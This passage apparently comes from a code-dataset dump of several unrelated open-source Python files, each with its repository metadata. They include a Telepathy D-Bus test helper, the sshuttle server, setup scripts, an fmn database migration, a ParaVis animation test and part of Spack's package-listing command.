tp_path_prefix = '/org/freedesktop/Telepathy'
class Event:
def __init__(self, type, **kw):
self.__dict__.update(kw)
self.type = type
def format_event(event):
ret = ['- type %s' % event.type]
for key in dir(event):
if key != 'type' and not key.startswith('_'):
ret.append('- %s: %s' % (
key, pprint.pformat(getattr(event, key))))
if key == 'error':
ret.append('%s' % getattr(event, key))
return ret
class EventPattern:
def __init__(self, type, **properties):
self.type = type
self.predicate = lambda x: True
if 'predicate' in properties:
self.predicate = properties['predicate']
del properties['predicate']
self.properties = properties
def __repr__(self):
properties = dict(self.properties)
if self.predicate:
properties['predicate'] = self.predicate
return '%s(%r, **%r)' % (
self.__class__.__name__, self.type, properties)
def match(self, event):
if event.type != self.type:
return False
for key, value in self.properties.iteritems():
try:
if getattr(event, key) != value:
return False
except AttributeError:
return False
if self.predicate(event):
return True
return False
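# Illustrative pattern sketch ('StatusChanged' is a hypothetical signal name;
# the 'dbus-signal' event type and the predicate keyword are both from this
# module):
#
#     pattern = EventPattern('dbus-signal', signal='StatusChanged',
#                            predicate=lambda e: e.args[0] == 0)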
class TimeoutError(Exception):
pass
class BaseEventQueue:
"""Abstract event queue base class.
Implement the wait() method to have something that works.
"""
def __init__(self, timeout=None):
self.verbose = False
self.forbidden_events = set()
if timeout is None:
self.timeout = 5
else:
self.timeout = timeout
def log(self, s):
if self.verbose:
print s
def log_event(self, event):
if self.verbose:
self.log('got event:')
if self.verbose:
map(self.log, format_event(event))
def forbid_events(self, patterns):
"""
Add patterns (an iterable of EventPattern) to the set of forbidden
events. If a forbidden event occurs during an expect or expect_many,
the test will fail.
"""
self.forbidden_events.update(set(patterns))
def unforbid_events(self, patterns):
"""
Remove 'patterns' (an iterable of EventPattern) from the set of
forbidden events. These must be the same EventPattern pointers that
were passed to forbid_events.
"""
self.forbidden_events.difference_update(set(patterns))
def _check_forbidden(self, event):
for e in self.forbidden_events:
if e.match(event):
print "forbidden event occurred:"
for x in format_event(event):
print x
assert False
def expect(self, type, **kw):
pattern = EventPattern(type, **kw)
while True:
event = self.wait()
self.log_event(event)
self._check_forbidden(event)
if pattern.match(event):
self.log('handled')
self.log('')
return event
self.log('not handled')
self.log('')
def expect_many(self, *patterns):
ret = [None] * len(patterns)
while None in ret:
try:
event = self.wait()
except TimeoutError:
self.log('timeout')
self.log('still expecting:')
for i, pattern in enumerate(patterns):
if ret[i] is None:
self.log(' - %r' % pattern)
raise
self.log_event(event)
self._check_forbidden(event)
for i, pattern in enumerate(patterns):
if ret[i] is None and pattern.match(event):
self.log('handled')
self.log('')
ret[i] = event
break
else:
self.log('not handled')
self.log('')
return ret
def demand(self, type, **kw):
pattern = EventPattern(type, **kw)
event = self.wait()
self.log_event(event)
if pattern.match(event):
self.log('handled')
self.log('')
return event
self.log('not handled')
raise RuntimeError('expected %r, got %r' % (pattern, event))
class IteratingEventQueue(BaseEventQueue):
"""Event queue that works by iterating the Twisted reactor."""
def __init__(self, timeout=None):
BaseEventQueue.__init__(self, timeout)
self.events = []
def wait(self):
stop = [False]
def later():
stop[0] = True
delayed_call = reactor.callLater(self.timeout, later)
while (not self.events) and (not stop[0]):
reactor.iterate(0.1)
if self.events:
delayed_call.cancel()
return self.events.pop(0)
else:
raise TimeoutError
def append(self, event):
self.events.append(event)
# compatibility
handle_event = append
class TestEventQueue(BaseEventQueue):
def __init__(self, events):
BaseEventQueue.__init__(self)
self.events = events
def wait(self):
if self.events:
return self.events.pop(0)
else:
raise TimeoutError
class EventQueueTest(unittest.TestCase):
def test_expect(self):
queue = TestEventQueue([Event('foo'), Event('bar')])
assert queue.expect('foo').type == 'foo'
assert queue.expect('bar').type == 'bar'
def test_expect_many(self):
queue = TestEventQueue([Event('foo'), Event('bar')])
bar, foo = queue.expect_many(
EventPattern('bar'),
EventPattern('foo'))
assert bar.type == 'bar'
assert foo.type == 'foo'
def test_expect_many2(self):
# Test that events are only matched against patterns that haven't yet
# been matched. This tests a regression.
queue = TestEventQueue([Event('foo', x=1), Event('foo', x=2)])
foo1, foo2 = queue.expect_many(
EventPattern('foo'),
EventPattern('foo'))
assert foo1.type == 'foo' and foo1.x == 1
assert foo2.type == 'foo' and foo2.x == 2
def test_timeout(self):
queue = TestEventQueue([])
self.assertRaises(TimeoutError, queue.expect, 'foo')
def test_demand(self):
queue = TestEventQueue([Event('foo'), Event('bar')])
foo = queue.demand('foo')
assert foo.type == 'foo'
def test_demand_fail(self):
queue = TestEventQueue([Event('foo'), Event('bar')])
self.assertRaises(RuntimeError, queue.demand, 'bar')
def unwrap(x):
"""Hack to unwrap D-Bus values, so that they're easier to read when
printed."""
if isinstance(x, list):
return map(unwrap, x)
if isinstance(x, tuple):
return tuple(map(unwrap, x))
if isinstance(x, dict):
return dict([(unwrap(k), unwrap(v)) for k, v in x.iteritems()])
if isinstance(x, dbus.Boolean):
return bool(x)
for t in [unicode, str, long, int, float]:
if isinstance(x, t):
return t(x)
return x
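# e.g. unwrap(dbus.Boolean(True)) -> True, while lists, tuples and dicts are
# converted element by element.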
def call_async(test, proxy, method, *args, **kw):
"""Call a D-Bus method asynchronously and generate an event for the
resulting method return/error."""
def reply_func(*ret):
test.handle_event(Event('dbus-return', method=method,
value=unwrap(ret)))
def error_func(err):
test.handle_event(Event('dbus-error', method=method, error=err,
name=err.get_dbus_name(), message=err.message))
method_proxy = getattr(proxy, method)
kw.update({'reply_handler': reply_func, 'error_handler': error_func})
method_proxy(*args, **kw)
def sync_dbus(bus, q, conn):
# Dummy D-Bus method call
# This won't do the right thing unless the proxy has a unique name.
assert conn.object.bus_name.startswith(':')
root_object = bus.get_object(conn.object.bus_name, '/')
call_async(
q, dbus.Interface(root_object, 'org.freedesktop.DBus.Peer'), 'Ping')
q.expect('dbus-return', method='Ping')
class ProxyWrapper:
def __init__(self, object, default, others):
self.object = object
self.default_interface = dbus.Interface(object, default)
self.Properties = dbus.Interface(object, dbus.PROPERTIES_IFACE)
self.TpProperties = \
dbus.Interface(object, tp_name_prefix + '.Properties')
self.interfaces = dict([
(name, dbus.Interface(object, iface))
for name, iface in others.iteritems()])
def __getattr__(self, name):
if name in self.interfaces:
return self.interfaces[name]
if name in self.object.__dict__:
return getattr(self.object, name)
return getattr(self.default_interface, name)
def wrap_connection(conn):
return ProxyWrapper(conn, tp_name_prefix + '.Connection',
dict([
(name, tp_name_prefix + '.Connection.Interface.' + name)
for name in ['Aliasing', 'Avatars', 'Capabilities', 'Contacts',
'Presence', 'SimplePresence', 'Requests']] +
[('Peer', 'org.freedesktop.DBus.Peer'),
('ContactCapabilities', cs.CONN_IFACE_CONTACT_CAPS),
('Location', cs.CONN_IFACE_LOCATION),
]))
def wrap_channel(chan, type_, extra=None):
interfaces = {
type_: tp_name_prefix + '.Channel.Type.' + type_,
'Group': tp_name_prefix + '.Channel.Interface.Group',
}
if extra:
interfaces.update(dict([
(name, tp_name_prefix + '.Channel.Interface.' + name)
for name in extra]))
return ProxyWrapper(chan, tp_name_prefix + '.Channel', interfaces)
def make_connection(bus, event_func, name, proto, params):
cm = bus.get_object(
tp_name_prefix + '.ConnectionManager.%s' % name,
tp_path_prefix + '/ConnectionManager/%s' % name)
cm_iface = dbus.Interface(cm, tp_name_prefix + '.ConnectionManager')
connection_name, connection_path = cm_iface.RequestConnection(
proto, params)
conn = wrap_connection(bus.get_object(connection_name, connection_path))
bus.add_signal_receiver(
lambda *args, **kw:
event_func(
Event('dbus-signal',
path=unwrap(kw['path']),
signal=kw['member'], args=map(unwrap, args),
interface=kw['interface'])),
None, # signal name
None, # interface
cm._named_service,
path_keyword='path',
member_keyword='member',
interface_keyword='interface',
byte_arrays=True
)
return conn
def make_channel_proxy(conn, path, iface):
bus = dbus.SessionBus()
chan = bus.get_object(conn.object.bus_name, path)
chan = dbus.Interface(chan, tp_name_prefix + '.' + iface)
return chan
# block_reading can be used if the test wants to choose when we start to
# read data from the socket.
class EventProtocol(Protocol):
def __init__(self, queue=None, block_reading=False):
self.queue = queue
self.block_reading = block_reading
def dataReceived(self, data):
if self.queue is not None:
self.queue.handle_event(Event('socket-data', protocol=self,
data=data))
def sendData(self, data):
self.transport.write(data)
def connectionMade(self):
if self.block_reading:
self.transport.stopReading()
def connectionLost(self, reason=None):
if self.queue is not None:
self.queue.handle_event(Event('socket-disconnected', protocol=self))
class EventProtocolFactory(Factory):
def __init__(self, queue, block_reading=False):
self.queue = queue
self.block_reading = block_reading
def _create_protocol(self):
return EventProtocol(self.queue, self.block_reading)
def buildProtocol(self, addr):
proto = self._create_protocol()
self.queue.handle_event(Event('socket-connected', protocol=proto))
return proto
class EventProtocolClientFactory(EventProtocolFactory, ClientFactory):
pass
def watch_tube_signals(q, tube):
def got_signal_cb(*args, **kwargs):
q.handle_event(Event('tube-signal',
path=kwargs['path'],
signal=kwargs['member'],
args=map(unwrap, args),
tube=tube))
tube.add_signal_receiver(got_signal_cb,
path_keyword='path', member_keyword='member',
byte_arrays=True)
def pretty(x):
return pprint.pformat(unwrap(x))
def assertEquals(expected, value):
if expected != value:
raise AssertionError(
"expected:\n%s\ngot:\n%s" % (pretty(expected), pretty(value)))
def assertNotEquals(expected, value):
if expected == value:
raise AssertionError(
"expected something other than:\n%s" % pretty(value))
def assertContains(element, value):
if element not in value:
raise AssertionError(
"expected:\n%s\nin:\n%s" % (pretty(element), pretty(value)))
def assertDoesNotContain(element, value):
if element in value:
raise AssertionError(
"expected:\n%s\nnot in:\n%s" % (pretty(element), pretty(value)))
def assertLength(length, value):
if len(value) != length:
raise AssertionError("expected: length %d, got length %d:\n%s" % (
length, len(value), pretty(value)))
def assertFlagsSet(flags, value):
masked = value & flags
if masked != flags:
raise AssertionError(
"expected flags %u, of which only %u are set in %u" % (
flags, masked, value))
def assertFlagsUnset(flags, value):
masked = value & flags
if masked != 0:
raise AssertionError(
"expected none of flags %u, but %u are set in %u" % (
flags, masked, value))
def install_colourer():
def red(s):
return '\x1b[31m%s\x1b[0m' % s
def green(s):
return '\x1b[32m%s\x1b[0m' % s
patterns = {
'handled': green,
'not handled': red,
}
class Colourer:
def __init__(self, fh, patterns):
self.fh = fh
self.patterns = patterns
def write(self, s):
f = self.patterns.get(s, lambda x: x)
self.fh.write(f(s))
sys.stdout = Colourer(sys.stdout, patterns)
return sys.stdout
if __name__ == '__main__':
unittest.main()
|
community-ssu/telepathy-gabble
|
tests/twisted/servicetest.py
|
Python
|
lgpl-2.1
| 15,082
|
from setuptools import setup, find_packages
import pbs
setup(
name = pbs.__projectname__,
version = pbs.__release__,
packages = find_packages(),
author = pbs.__authors__,
author_email = pbs.__authoremails__,
description = pbs.__description__,
license = "GPLv2",
keywords = pbs.__keywords__,
entry_points = {
'console_scripts': [
'pstat = pbs.pstat:main',
'psub = pbs.psub:main',
'taskmaster = pbs.taskmaster:main',
],
},
)
|
demis001/pbs
|
setup.py
|
Python
|
lgpl-2.1
| 517
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2013 Matt Jeffery <matt@clan.se>
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
import warnings
import logging
import collections
log = logging.getLogger(__name__)
class APIRelationship(object):
"""
Define a relationship between to entities
"""
def __init__(self, related_entity, use_list=True, *args, **kwargs):
"""
Setup the relationship
"""
self.related_entity = related_entity
self.use_list = use_list
self._parent = None
def copy(self):
relation = APIRelationship(self.related_entity)
relation._parent = self._parent
return relation
@property
def parent(self):
if self._parent is None:
raise RuntimeError("parent must be set, has the class been setup correctly?")
else:
return self._parent
@parent.setter
def parent(self, parent):
self._parent = parent
@property
def related_entity_name(self):
return "_"+(self.related_entity.__apiclass_plural__ if self.use_list else self.related_entity.__apiclass__)
def __call__(self):
"""
Return the related entities from the API
"""
relation_attr = self.related_entity_name
if not hasattr(self.parent, relation_attr) or getattr(self.parent, relation_attr) is None:
path = "{cls}/{id}/{rel_cls}/".format(cls=self.parent.clsname,
id=self.parent.id,
rel_cls=self.related_entity.__apiclass__)
reply = self.parent.session.request(path)
if self.use_list:
if isinstance(reply, collections.Iterable):
setattr(self.parent, relation_attr, reply)
else:
                    # force the relationship into a list
setattr(self.parent, relation_attr, [reply])
else:
if isinstance(reply, collections.Iterable):
# force the relationship out of a list and raise a warning
warnings.warn("relationship was not expecting a list result, perhaps this is no a 1:1 relationship", stacklevel=2)
setattr(self.parent, relation_attr, reply[0] if len(reply) > 0 else None)
else:
setattr(self.parent, relation_attr, reply)
return getattr(self.parent, relation_attr)
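# Illustrative wiring sketch ('Artist', 'Track' and the APIEntity base class
# are hypothetical; the path built above would then be "artist/<id>/track/"):
#
#     class Artist(APIEntity):
#         tracks = APIRelationship(Track, use_list=True)
#
#     artist.tracks()   # fetches the related tracks once, then caches them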
|
mattjeffery/semetric-python
|
semetric/apiclient/util.py
|
Python
|
lgpl-2.1
| 3,202
|
import re, struct, socket, select, traceback, time
if not globals().get('skip_imports'):
import ssnet, helpers, hostwatch
import compat.ssubprocess as ssubprocess
from ssnet import SockWrapper, Handler, Proxy, Mux, MuxWrapper
from helpers import *
def _ipmatch(ipstr):
if ipstr == 'default':
ipstr = '0.0.0.0/0'
m = re.match(r'^(\d+(\.\d+(\.\d+(\.\d+)?)?)?)(?:/(\d+))?$', ipstr)
if m:
g = m.groups()
ips = g[0]
width = int(g[4] or 32)
        if g[1] is None:
            ips += '.0.0.0'
            width = min(width, 8)
        elif g[2] is None:
            ips += '.0.0'
            width = min(width, 16)
        elif g[3] is None:
            ips += '.0'
            width = min(width, 24)
return (struct.unpack('!I', socket.inet_aton(ips))[0], width)
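# e.g. _ipmatch('10.1') -> (0x0a010000, 16) and _ipmatch('default') -> (0, 0);
# strings that don't parse as an IPv4 prefix yield None.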
def _ipstr(ip, width):
if width >= 32:
return ip
else:
return "%s/%d" % (ip, width)
def _maskbits(netmask):
if not netmask:
return 32
for i in range(32):
if netmask[0] & _shl(1, i):
return 32-i
return 0
def _shl(n, bits):
return n * int(2**bits)
def _list_routes():
argv = ['netstat', '-rn']
p = ssubprocess.Popen(argv, stdout=ssubprocess.PIPE)
routes = []
for line in p.stdout:
cols = re.split(r'\s+', line)
ipw = _ipmatch(cols[0])
if not ipw:
continue # some lines won't be parseable; never mind
maskw = _ipmatch(cols[2]) # linux only
mask = _maskbits(maskw) # returns 32 if maskw is null
width = min(ipw[1], mask)
ip = ipw[0] & _shl(_shl(1, width) - 1, 32-width)
routes.append((socket.AF_INET, socket.inet_ntoa(struct.pack('!I', ip)), width))
rv = p.wait()
if rv != 0:
log('WARNING: %r returned %d\n' % (argv, rv))
log('WARNING: That prevents --auto-nets from working.\n')
return routes
def list_routes():
for (family, ip,width) in _list_routes():
if not ip.startswith('0.') and not ip.startswith('127.'):
yield (family, ip,width)
def _exc_dump():
exc_info = sys.exc_info()
return ''.join(traceback.format_exception(*exc_info))
def start_hostwatch(seed_hosts):
s1,s2 = socket.socketpair()
pid = os.fork()
if not pid:
# child
rv = 99
try:
try:
s2.close()
os.dup2(s1.fileno(), 1)
os.dup2(s1.fileno(), 0)
s1.close()
rv = hostwatch.hw_main(seed_hosts) or 0
except Exception, e:
log('%s\n' % _exc_dump())
rv = 98
finally:
os._exit(rv)
s1.close()
return pid,s2
class Hostwatch:
def __init__(self):
self.pid = 0
self.sock = None
class DnsProxy(Handler):
def __init__(self, mux, chan, request):
# FIXME! IPv4 specific
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
Handler.__init__(self, [sock])
self.timeout = time.time()+30
self.mux = mux
self.chan = chan
self.tries = 0
self.peer = None
self.request = request
self.sock = sock
# FIXME! IPv4 specific
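        # (TTL 42 below appears to tag sshuttle's own packets so that local
        # firewall rules can recognise and skip them, avoiding loops when
        # client and server share a host.)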
self.sock.setsockopt(socket.SOL_IP, socket.IP_TTL, 42)
self.try_send()
def try_send(self):
if self.tries >= 3:
return
self.tries += 1
# FIXME! Support IPv6 nameservers
self.peer = resolvconf_random_nameserver()[1]
self.sock.connect((self.peer, 53))
debug2('DNS: sending to %r\n' % self.peer)
try:
self.sock.send(self.request)
except socket.error, e:
if e.args[0] in ssnet.NET_ERRS:
# might have been spurious; try again.
# Note: these errors sometimes are reported by recv(),
# and sometimes by send(). We have to catch both.
debug2('DNS send to %r: %s\n' % (self.peer, e))
self.try_send()
return
else:
log('DNS send to %r: %s\n' % (self.peer, e))
return
def callback(self):
try:
data = self.sock.recv(4096)
except socket.error, e:
if e.args[0] in ssnet.NET_ERRS:
# might have been spurious; try again.
# Note: these errors sometimes are reported by recv(),
# and sometimes by send(). We have to catch both.
debug2('DNS recv from %r: %s\n' % (self.peer, e))
self.try_send()
return
else:
log('DNS recv from %r: %s\n' % (self.peer, e))
return
debug2('DNS response: %d bytes\n' % len(data))
self.mux.send(self.chan, ssnet.CMD_DNS_RESPONSE, data)
self.ok = False
class UdpProxy(Handler):
def __init__(self, mux, chan, family):
sock = socket.socket(family, socket.SOCK_DGRAM)
Handler.__init__(self, [sock])
self.timeout = time.time()+30
self.mux = mux
self.chan = chan
self.sock = sock
if family == socket.AF_INET:
self.sock.setsockopt(socket.SOL_IP, socket.IP_TTL, 42)
def send(self, dstip, data):
debug2('UDP: sending to %r port %d\n' % dstip)
try:
self.sock.sendto(data,dstip)
except socket.error, e:
log('UDP send to %r port %d: %s\n' % (dstip[0], dstip[1], e))
return
def callback(self):
try:
data,peer = self.sock.recvfrom(4096)
        except socket.error, e:
            # 'peer' is unbound when recvfrom() itself fails, so it must not
            # be referenced in this error path
            log('UDP recv: %s\n' % e)
            return
debug2('UDP response: %d bytes\n' % len(data))
hdr = "%s,%r,"%(peer[0], peer[1])
self.mux.send(self.chan, ssnet.CMD_UDP_DATA, hdr+data)
def main():
if helpers.verbose >= 1:
helpers.logprefix = ' s: '
else:
helpers.logprefix = 'server: '
debug1('latency control setting = %r\n' % latency_control)
routes = list(list_routes())
debug1('available routes:\n')
for r in routes:
debug1(' %d/%s/%d\n' % r)
# synchronization header
sys.stdout.write('\0\0SSHUTTLE0001')
sys.stdout.flush()
handlers = []
mux = Mux(socket.fromfd(sys.stdin.fileno(),
socket.AF_INET, socket.SOCK_STREAM),
socket.fromfd(sys.stdout.fileno(),
socket.AF_INET, socket.SOCK_STREAM))
handlers.append(mux)
routepkt = ''
for r in routes:
routepkt += '%d,%s,%d\n' % r
mux.send(0, ssnet.CMD_ROUTES, routepkt)
hw = Hostwatch()
hw.leftover = ''
def hostwatch_ready():
assert(hw.pid)
content = hw.sock.recv(4096)
if content:
lines = (hw.leftover + content).split('\n')
if lines[-1]:
# no terminating newline: entry isn't complete yet!
hw.leftover = lines.pop()
lines.append('')
else:
hw.leftover = ''
mux.send(0, ssnet.CMD_HOST_LIST, '\n'.join(lines))
else:
raise Fatal('hostwatch process died')
def got_host_req(data):
if not hw.pid:
(hw.pid,hw.sock) = start_hostwatch(data.strip().split())
handlers.append(Handler(socks = [hw.sock],
callback = hostwatch_ready))
mux.got_host_req = got_host_req
def new_channel(channel, data):
(family,dstip,dstport) = data.split(',', 2)
family = int(family)
dstport = int(dstport)
outwrap = ssnet.connect_dst(family, dstip, dstport)
handlers.append(Proxy(MuxWrapper(mux, channel), outwrap))
mux.new_channel = new_channel
dnshandlers = {}
def dns_req(channel, data):
debug2('Incoming DNS request channel=%d.\n' % channel)
h = DnsProxy(mux, channel, data)
handlers.append(h)
dnshandlers[channel] = h
mux.got_dns_req = dns_req
udphandlers = {}
def udp_req(channel, cmd, data):
debug2('Incoming UDP request channel=%d, cmd=%d\n' % (channel,cmd))
if cmd == ssnet.CMD_UDP_DATA:
(dstip,dstport,data) = data.split(",",2)
dstport = int(dstport)
debug2('is incoming UDP data. %r %d.\n' % (dstip,dstport))
h = udphandlers[channel]
h.send((dstip,dstport),data)
elif cmd == ssnet.CMD_UDP_CLOSE:
debug2('is incoming UDP close\n')
h = udphandlers[channel]
h.ok = False
del mux.channels[channel]
def udp_open(channel, data):
debug2('Incoming UDP open.\n')
family = int(data)
mux.channels[channel] = lambda cmd, data: udp_req(channel, cmd, data)
if channel in udphandlers:
raise Fatal('UDP connection channel %d already open'%channel)
else:
h = UdpProxy(mux, channel, family)
handlers.append(h)
udphandlers[channel] = h
mux.got_udp_open = udp_open
while mux.ok:
if hw.pid:
assert(hw.pid > 0)
(rpid, rv) = os.waitpid(hw.pid, os.WNOHANG)
if rpid:
raise Fatal('hostwatch exited unexpectedly: code 0x%04x\n' % rv)
ssnet.runonce(handlers, mux)
if latency_control:
mux.check_fullness()
mux.callback()
if dnshandlers:
now = time.time()
for channel,h in dnshandlers.items():
if h.timeout < now or not h.ok:
debug3('expiring dnsreqs channel=%d\n' % channel)
del dnshandlers[channel]
h.sock.close()
h.ok = False
for channel,h in udphandlers.items():
if not h.ok:
debug3('expiring UDP channel=%d\n' % channel)
del udphandlers[channel]
h.sock.close()
h.ok = False
|
brianmay/sshuttle
|
src/server.py
|
Python
|
lgpl-2.1
| 10,097
|
#!/usr/bin/env python
from __future__ import absolute_import, division, print_function
from io import open
from os.path import abspath, dirname, join
from setuptools import setup
PROJECT_ROOT = abspath(dirname(__file__))
with open(join(PROJECT_ROOT, 'README.rst'), encoding='utf-8') as f:
readme = f.read()
version = (
[l for l in open(join(PROJECT_ROOT, 'zeroconf.py')) if '__version__' in l][0]
.split('=')[-1]
.strip().strip('\'"')
)
setup(
name='zeroconf',
version=version,
description='Pure Python Multicast DNS Service Discovery Library '
'(Bonjour/Avahi compatible)',
long_description=readme,
author='Paul Scott-Murphy, William McBrine, Jakub Stasiak',
url='https://github.com/jstasiak/python-zeroconf',
py_modules=['zeroconf'],
platforms=['unix', 'linux', 'osx'],
license='LGPL',
zip_safe=False,
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: GNU Lesser General Public License v2 (LGPLv2)',
'Operating System :: POSIX',
'Operating System :: POSIX :: Linux',
'Operating System :: MacOS :: MacOS X',
'Topic :: Software Development :: Libraries',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: Implementation :: CPython',
'Programming Language :: Python :: Implementation :: PyPy',
],
keywords=[
'Bonjour', 'Avahi', 'Zeroconf', 'Multicast DNS', 'Service Discovery',
'mDNS',
],
install_requires=[
'enum-compat',
'netifaces',
'six',
],
)
|
nameoftherose/python-zeroconf
|
setup.py
|
Python
|
lgpl-2.1
| 1,982
|
"""Cull removed rules
Revision ID: 2136a1f22f1f
Revises: 2ea9623b21fa
Create Date: 2015-01-08 12:23:51.829172
"""
from __future__ import print_function
# revision identifiers, used by Alembic.
revision = '2136a1f22f1f'
down_revision = '2ea9623b21fa'
from alembic import op
import sqlalchemy as sa
import fmn.lib.models
def upgrade():
engine = op.get_bind().engine
session = sa.orm.scoped_session(sa.orm.sessionmaker(bind=engine))
# Find all rules that got removed in this PR and nuke them
# https://github.com/fedora-infra/fmn.rules/pull/21
goners = [
'fmn.rules:pkgdb_acl_user_remove',
'fmn.rules:pkgdb_branch_clone',
'fmn.rules:pkgdb_package_retire',
]
for path in goners:
rules = session.query(fmn.lib.models.Rule)\
.filter_by(code_path=path).all()
for rule in rules:
print("Deleting %r." % rule)
session.delete(rule)
# And one of them wasn't actually removed, it was just renamed.
moves = [
('fmn.rules:pkgdb_critpath_update',
'fmn.rules:pkgdb_package_critpath_update'),
]
for src, dest in moves:
rules = session.query(fmn.lib.models.Rule)\
.filter_by(code_path=src).all()
for rule in rules:
rule.code_path = dest
session.commit()
def downgrade():
pass
|
fedora-infra/fmn
|
alembic/versions/2136a1f22f1f_cull_removed_rules.py
|
Python
|
lgpl-2.1
| 1,355
|
# Copyright (C) 2010-2014 CEA/DEN, EDF R&D
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# See http://www.salome-platform.org/ or email : webmaster.salome@opencascade.com
#
# This case corresponds to: /visu/animation/A1 case
# Test animation API
import sys
import os
from paravistest import *
from presentations import *
from pvsimple import *
import pvserver as paravis
my_paravis = paravis.myParavis
# 1. TimeStamps.med import
print 'Importing "TimeStamps.med"................',
file_path = datadir + "TimeStamps.med"
OpenDataFile(file_path)
med_reader = GetActiveSource()
if med_reader is None:
print "FAILED"
else:
print "OK"
# 2. CutLines creation
print "Creating Cut Lines........................",
med_field = "vitesse"
cutlines = CutLinesOnField(med_reader, EntityType.NODE, med_field, 1,
nb_lines = 20,
orientation1=Orientation.XY, orientation2=Orientation.ZX)
if cutlines is None:
print "FAILED"
else:
print "OK"
# 3. Display CutLines
print "Getting a Viewer.........................",
view = GetRenderView()
if view is None:
print "FAILED"
else:
print "OK"
cutlines.Visibility = 1
Render(view=view)
cutlines.Visibility = 0
Render(view=view)
display_only(cutlines, view=view)
reset_view(view=view)
# 4. Animation
print "Get Animation scene.....................",
scene = GetAnimationScene()
if scene is None:
print "FAILED"
else:
print "OK"
print "Duration default... ", scene.Duration
scene.Duration = -10
scene.Duration = 120
scene.Duration = 0
scene.Duration = 30
print "Duration ... ", scene.Duration
print "Loop ... ", scene.Loop
scene.Loop = 1
print "Loop ... ", scene.Loop
scene.Loop = 0
print "Loop ... ", scene.Loop
print "AnimationTime ... ", scene.AnimationTime
scene.Play()
scene.GoToFirst()
scene.GoToNext()
scene.GoToNext()
print "AnimationTime ... ", scene.AnimationTime
scene.GoToPrevious()
scene.GoToLast()
scene.Stop()
print "AnimationTime ... ", scene.AnimationTime
scene.AnimationTime = -1
scene.AnimationTime = scene.TimeKeeper.TimestepValues[1]
scene.AnimationTime = scene.TimeKeeper.TimestepValues[0]
nb_frames = scene.NumberOfFrames
print "NumberOfFrames ... ", nb_frames
|
FedoraScientific/salome-paravis
|
test/VisuPrs/Animation/A1.py
|
Python
|
lgpl-2.1
| 2,899
|
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from __future__ import print_function
from __future__ import division
import argparse
import fnmatch
import os
import re
import sys
import math
import json
import llnl.util.tty as tty
from llnl.util.tty.colify import colify
import spack.dependency
import spack.repo
import spack.cmd.common.arguments as arguments
from spack.version import VersionList
if sys.version_info > (3, 1):
from html import escape # novm
else:
from cgi import escape
description = "list and search available packages"
section = "basic"
level = "short"
formatters = {}
def formatter(func):
"""Decorator used to register formatters"""
formatters[func.__name__] = func
return func
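# e.g. the @formatter functions below (name_only, version_json, html) register
# themselves here and thereby become the legal values for `spack list --format`.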
def setup_parser(subparser):
subparser.add_argument(
'filter', nargs=argparse.REMAINDER,
help='optional case-insensitive glob patterns to filter results')
subparser.add_argument(
'-d', '--search-description', action='store_true', default=False,
help='filtering will also search the description for a match')
subparser.add_argument(
'--format', default='name_only', choices=formatters,
help='format to be used to print the output [default: name_only]')
subparser.add_argument(
'--update', metavar='FILE', default=None, action='store',
help='write output to the specified file, if any package is newer')
arguments.add_common_arguments(subparser, ['tags'])
def filter_by_name(pkgs, args):
"""
Filters the sequence of packages according to user prescriptions
Args:
pkgs: sequence of packages
args: parsed command line arguments
Returns:
filtered and sorted list of packages
"""
if args.filter:
res = []
for f in args.filter:
if '*' not in f and '?' not in f:
r = fnmatch.translate('*' + f + '*')
else:
r = fnmatch.translate(f)
rc = re.compile(r, flags=re.IGNORECASE)
res.append(rc)
if args.search_description:
def match(p, f):
if f.match(p):
return True
pkg = spack.repo.get(p)
if pkg.__doc__:
return f.match(pkg.__doc__)
return False
else:
def match(p, f):
return f.match(p)
pkgs = [p for p in pkgs if any(match(p, f) for f in res)]
return sorted(pkgs, key=lambda s: s.lower())
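# e.g. a bare filter such as "mpi" is wrapped into the glob *mpi* and matched
# case-insensitively, so `spack list mpi` lists every package whose name
# contains "mpi" (or whose docstring matches, with --search-description).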
@formatter
def name_only(pkgs, out):
indent = 0
if out.isatty():
tty.msg("%d packages." % len(pkgs))
colify(pkgs, indent=indent, output=out)
def github_url(pkg):
"""Link to a package file on github."""
url = 'https://github.com/spack/spack/blob/develop/var/spack/repos/builtin/packages/{0}/package.py'
return url.format(pkg.name)
def rows_for_ncols(elts, ncols):
"""Print out rows in a table with ncols of elts laid out vertically."""
clen = int(math.ceil(len(elts) / ncols))
for r in range(clen):
row = []
for c in range(ncols):
i = c * clen + r
row.append(elts[i] if i < len(elts) else None)
yield row
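# e.g. rows_for_ncols(['a', 'b', 'c', 'd', 'e'], 2) yields ['a', 'd'],
# ['b', 'e'] and ['c', None]: elements are laid out down the columns.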
def get_dependencies(pkg):
all_deps = {}
for deptype in spack.dependency.all_deptypes:
deps = pkg.dependencies_of_type(deptype)
all_deps[deptype] = [d for d in deps]
return all_deps
@formatter
def version_json(pkg_names, out):
"""Print all packages with their latest versions."""
